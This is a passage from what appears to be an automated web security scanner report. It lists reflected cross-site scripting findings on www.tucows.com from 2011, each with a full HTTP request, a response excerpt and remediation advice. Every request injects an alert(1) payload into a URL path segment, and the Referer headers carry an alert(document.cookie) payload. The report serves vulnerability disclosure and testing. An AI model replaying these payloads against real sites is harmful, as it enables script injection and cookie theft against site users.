User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6fb"-alert(1)-"fc67c6d109f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45e8b"-alert(1)-"4bed83e5cce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a29"-alert(1)-"d118442f3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49df9"-alert(1)-"7cec1abd243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes49df9"-alert(1)-"7cec1abd243/js/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f1c"-alert(1)-"5f5b3393d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82b97"-alert(1)-"d0e2ad1d532 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccea9"-alert(1)-"cd05073d4ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87352"-alert(1)-"0f2157d1bbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3034"-alert(1)-"04ca174d04c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5361f"-alert(1)-"5652dc7710f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e1"-alert(1)-"042603f8178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ec8"-alert(1)-"817640c3898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/show_layer.js82ec8"-alert(1)-"817640c3898 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
